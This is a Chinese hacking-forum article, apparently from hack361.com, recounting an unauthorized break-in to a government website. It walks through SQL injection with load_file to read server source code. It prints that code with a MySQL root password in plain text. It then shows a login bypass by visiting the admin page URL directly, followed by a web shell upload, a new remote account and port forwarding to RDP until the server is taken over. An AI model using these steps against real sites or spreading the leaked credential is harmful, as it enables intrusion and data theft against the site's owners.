WAP手机版 RSS订阅 加入收藏  设为首页
黑客技术
当前位置:首页 > 黑客技术

root权限读网站后台源代码绕过登录

时间:2019/7/13 11:32:58   作者:安琪   来源:www.hack361.com   阅读:0   评论:0
内容摘要:root权限读网站后台源代码绕过登录作者:安琪QQ:1437232096然后偶然的机会,看到了一个政府站。说明下:之前我发的教程,给1.注入点:id=2132.id=213'出错,直接爆目录出来了·D:\www\XXXXXX\cyqjs\127483935.phpROOT权限可以load_file查出MYSQL用户,后...

root权限读网站后台源代码绕过登录


作者:安琪

QQ:1437232096


然后偶然的机会,看到了一个政府站。说明下:之前我发的教程,给

1.注入点:

id=213

2.id=213' 出错,直接爆

目录出来了·D:\www\XXXXXX\cyqjs\127483935.php 

ROOT权限

可以load_file查出MYSQL用户,后台密码也是迟早的事了。

注入点:

报错时候出现,查到MYSQL数据库:
$con=mysql_connect("localhost","root","nbm3x4");    
mysql_select_db("edudata");
mysql_query("set names gbk"); 
$result=mysql_query("update news set renum=renum+1 where 

id=$id",$con);
$sql="select renum,date from news where id=$id";
$result=mysql_query($sql,$con);
$record=mysql_fetch_array($result);
$renum=$record["renum"];
$date=$record["date"];
mysql_close($con);

拿SHELL也是很容易的,直接导一句话就行了,

通过源码绕过后台密码。

我查询下后台文件logon.php的源码,发现跳转的是login.php,查询下这个文件出现了下面这个源码:

if ($username==$name and $userpassword==$password)
{
echo "<script language='javascript'>location.href='admin/index.php

id=$id&writer=$writer&level=$level&logon_name=$logon_name'; 

</script>";
}
else
{
echo "<br><br><div align=center><a href=logon.php>[密码错误!请返回]

</a>";

他大概意思 我猜是密码正确就跳转到admin/index.php

id=$id&writer=$writer&level=$level&logon_name=$logon_name这个后台?否

则又返回开始登录的logon.php文件,那我直接访问

http://www.XXXXX.net/admin/index.php

id=$id&writer=$writer&level=$level&logon_name=$logon_name这个后台,成

功绕过后台.拿SHELL也是很简单的,直接在下载资源里上传PHP

文件

权限也很大,直接添加远程帐号密码,不过是内网,LCX工具端口转发

,登录3389,服务器沦陷。。。。


文章来源(黑客网:www.hack361.com)



标签:权限 网站 后台 源代码 代码 
上一篇:没有了
下一篇:phpMyFAQ 普通用户如何拿shell
相关评论

本站资源来自互联网收集 仅供用于学习和交流 请遵循相关法律法规 本站一切资源不代表本站立场

Copyright 2018 黑客361 www.hack361.com All Rights Reserved 

站长QQ1437232096

技术交流群99802923